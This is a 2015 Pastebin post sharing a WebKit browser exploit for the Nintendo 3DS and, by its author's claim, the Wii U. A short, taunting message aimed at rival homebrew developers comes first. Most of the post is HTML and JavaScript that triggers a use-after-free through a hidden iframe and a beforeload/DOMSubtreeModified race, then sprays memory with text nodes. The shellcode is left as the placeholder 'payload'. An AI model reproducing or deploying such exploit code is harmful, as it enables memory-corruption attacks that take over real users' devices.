3DSnice

WebKit Exploit N3DS + Bonus Exploit Wii U

Mar 18th, 2015
5,168
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Too bad that they take too long to figure out how make their Payload working.
  2. This is a working Webkit Exploit for N3DS/3DS/etc.. up to 9.5.
  3. I make it more simple, actually iframe display none help ;)
  4. It also work on Wii U up to 5.3.2 by using User Agent Nintendo 3DS
  5. Now hopefully devs or this shit team called Gateway 3DS will figure out how their own payload work.
  6. Special message to MathewE, do you really think that you are the only one who can work with this ?
  7. I know how you false bug work, including Miiplaza and co, you are late on the party.
  8.  
  9.  
  10.  
  11. <html>
  12. <head>
  13. <style> body {color:blue;background:black;} iframe {display:none;} h1 {text-align:center;}
  14.  
  15. </style>
  16. <script>
  17. if(parent==window) {
  18. window.onload = function() {
  19. document.body.innerHTML += "<iframe src='#' />";
  20. };
  21. } else if(navigator.userAgent.indexOf('Nintendo 3DS') != -1) {
  22. var nb = 0;
  23. window.onload = function () {
  24. f = window.frameElement;
  25. p = f.parentNode;
  26. var o = document.createElement("object");
  27. o.addEventListener('beforeload', function () {
  28. if (++nb == 1) {
  29. p.addEventListener('DOMSubtreeModified', parent.dsm, false);
  30. } else if (nb == 2) {
  31. p.removeChild(f);
  32. }
  33. }, false);
  34. document.body.appendChild(o);
  35. };
  36. }
  37. function magicfun(mem, size, v) {
  38. var a = new Array(size - 20);
  39. nv = v + unescape("%ucccc");
  40. for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
  41. var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
  42.  
  43. mem.push(t);
  44. }
  45.  
  46. function dsm(e) {
  47. var mem = [];
  48. for (var j = 20; j < 430; j++)
  49. magicfun(mem, j, unescape("payload"));
  50.  
  51. }
  52.  
  53. </script>
  54. </head>
  55. <body>
  56. </body>
  57. </html>
RAW Paste Data